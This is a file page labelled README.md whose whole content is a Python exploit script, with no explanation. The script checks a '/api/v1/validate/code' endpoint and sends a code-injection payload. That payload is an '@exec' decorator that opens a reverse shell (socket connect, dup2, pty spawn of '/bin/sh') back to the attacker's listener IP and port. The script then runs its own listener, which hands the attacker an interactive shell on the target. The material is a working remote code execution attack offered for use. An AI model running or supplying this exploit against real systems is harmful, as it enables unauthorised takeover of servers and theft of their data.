README.md
Rendering markdown...
import argparse
import requests
import socket
import threading
import time
import select
import sys
def check_vulnerable(ip, port):
url = f"http://{ip}:{port}/api/v1/validate/code"
try:
r = requests.head(url, timeout=5)
return r.status_code == 200
except:
return False
def send_payload(ip, port, listener_ip, listener_port):
url = f"http://{ip}:{port}/api/v1/validate/code"
headers = {"Content-Type": "application/json"}
payload_code = (
f'@exec("import socket,os,pty;'
f's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
f's.connect((\\\"{listener_ip}\\\",{listener_port}));'
f'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);'
f'pty.spawn(\\\"/bin/sh\\\")")\n'
f'def foo():\n pass'
)
data = {"code": payload_code}
try:
requests.post(url, json=data, headers=headers, timeout=5)
except:
pass
def handle_shell(client_socket):
try:
while True:
read_ready, _, _ = select.select([client_socket, sys.stdin], [], [])
for sock in read_ready:
if sock == client_socket:
data = client_socket.recv(4096)
if not data:
print("\n[*] Connection closed by target.")
return
print(data.decode(errors="ignore"), end='', flush=True)
else:
cmd = input()
if cmd.strip().lower() == "exit":
print("[*] Exiting shell.")
return
client_socket.sendall(cmd.encode() + b"\n")
except KeyboardInterrupt:
print("\n[!] Exiting shell.")
finally:
client_socket.close()
def start_listener(ip, port):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
server.bind((ip, port))
server.listen(1)
print(f"[+] Listening on {ip}:{port}")
client, addr = server.accept()
print(f"[+] Connection from {addr[0]}:{addr[1]}")
handle_shell(client)
except KeyboardInterrupt:
print("\n[!] Listener interrupted.")
finally:
server.close()
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-i", required=True, help="Target IP")
parser.add_argument("-p", required=True, type=int, help="Target port")
parser.add_argument("-l", required=True, help="Your listener IP")
parser.add_argument("-lp", required=True, type=int, help="Your listener port")
args = parser.parse_args()
if not check_vulnerable(args.i, args.p):
print("[-] Doesn't look vulnerable")
return
print(f"[+] Vulnerability detected at http://{args.i}:{args.p}/api/v1/validate/code")
listener_thread = threading.Thread(target=start_listener, args=(args.l, args.lp))
listener_thread.start()
time.sleep(2)
print(f"[+] Sending payload to http://{args.i}:{args.p}/api/v1/validate/code")
send_payload(args.i, args.p, args.l, args.lp)
listener_thread.join()
if __name__ == "__main__":
main()